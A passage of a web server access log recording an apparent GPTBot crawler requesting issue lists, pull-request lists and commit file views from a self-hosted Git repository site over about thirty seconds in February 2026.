"/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2f3.31.10%2fCMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 24199] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:17:57:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2f3.31.10%2fCMakeCCompiler.cmake" [Client 74.7.227.38] [Length 27775] [Gzip 5.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:17:57:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2f3.31.10%2fCMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 29533] [Gzip 5.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:17:57:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:57:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:57:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_stream_access.log?display=source" [Client 74.7.227.38] [Length 11202] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:17:57:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_access.log?display=rendered" [Client 74.7.227.38] [Length 11183] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:17:57:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_stream_access.log?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:17:57:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_error.log?display=rendered" [Client 74.7.227.38] [Length 11178] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_error.log" +[17/Feb/2026:17:57:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_error.log?display=rendered" [Client 74.7.227.38] [Length 11181] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:17:57:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=all&type=all" +[17/Feb/2026:17:58:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=all&type=all" +[17/Feb/2026:17:58:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9977] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&state=all&type=all" +[17/Feb/2026:17:58:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" +[17/Feb/2026:17:58:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2f.vscode%2fsettings.json" [Client 74.7.227.38] [Length 21484] [Gzip 3.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode/settings.json" +[17/Feb/2026:17:58:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:17:58:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/script.js?display=source" [Client 74.7.227.38] [Length 14917] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/js/script.js" +[17/Feb/2026:17:58:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10147] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:17:58:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10066] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:17:58:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/logger.hpp?display=rendered" [Client 74.7.227.38] [Length 11075] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/logger.hpp" +[17/Feb/2026:17:58:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10190] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:58:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:17:58:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake%2fapi" [Client 74.7.227.38] [Length 62172] [Gzip 14.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api" +[17/Feb/2026:17:58:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fbuild.ninja" [Client 74.7.227.38] [Length 24271] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:17:58:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fcpp%2fCMakeLists.txt" [Client 74.7.227.38] [Length 25495] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:17:58:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10231] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 